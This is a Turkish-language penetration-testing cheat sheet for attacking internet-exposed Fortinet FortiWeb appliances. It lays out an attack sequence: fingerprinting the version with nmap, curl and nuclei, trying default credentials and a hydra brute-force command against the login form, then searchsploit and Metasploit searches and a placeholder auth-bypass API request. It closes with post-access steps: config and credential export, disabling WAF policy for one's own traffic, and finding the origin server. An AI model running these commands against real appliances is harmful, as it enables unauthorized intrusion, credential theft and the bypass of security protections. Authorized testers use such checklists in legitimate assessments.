Fortinet Fortiweb
network appliance
FortiWeb WAF/appliance yönetim yüzeyi sık internete açık kalır. Sürüm fingerprint + public auth bypass/RCE zincirleri öncelikli hedeftir.
Metodoloji
Section titled “Metodoloji”-
Yönetim HTTPS portunu ve sürümü tespit et.
-
Public CVE / nuclei şablonlarını sürümle eşleştir.
-
Auth bypass veya RCE PoC uygula.
-
Config/credential dump ve pivot kanıtı al.
nmap -Pn -sV -p80,443,8443,4443 TARGETcurl -skI https://TARGET/curl -sk https://TARGET/ | rg -i 'fortiweb|fortinet'nuclei -u https://TARGET -tags fortiweb,fortinetFingerprint
Section titled “Fingerprint”curl -sk https://TARGET/logincurl -sk https://TARGET/api/v2.0/system/statuswhatweb -a 3 https://TARGETAuth / default
Section titled “Auth / default”admin:adminadmin:(boş)admin:fortinethydra -L users.txt -P rockyou.txt https-post-form://TARGET/login:username=^USER^&secretkey=^PASS^:F=errorPublic exploit yolu
Section titled “Public exploit yolu”searchsploit fortiwebmsfconsole -q -x 'search fortiweb; exit'# sürüm eşleşen PoC'yi laboratuvarda doğrula — path/parametre CVE'ye göre değişircurl -sk 'https://TARGET/api/v2.0/CMD' -H 'Authorization: Bearer BYPASS'Post-erişim
Section titled “Post-erişim”- WAF policy disable / bypass kendi trafiğin için- Yönetici config export- Arkasındaki origin IP keşficurl -sk https://TARGET/api/v2.0/system/config -H 'Cookie: SESSION'Checklist
Section titled “Checklist”[ ] Yönetim portu + sürüm[ ] Nuclei/CVE eşleşmesi[ ] Auth bypass veya geçerli login[ ] Config/RCE kanıtı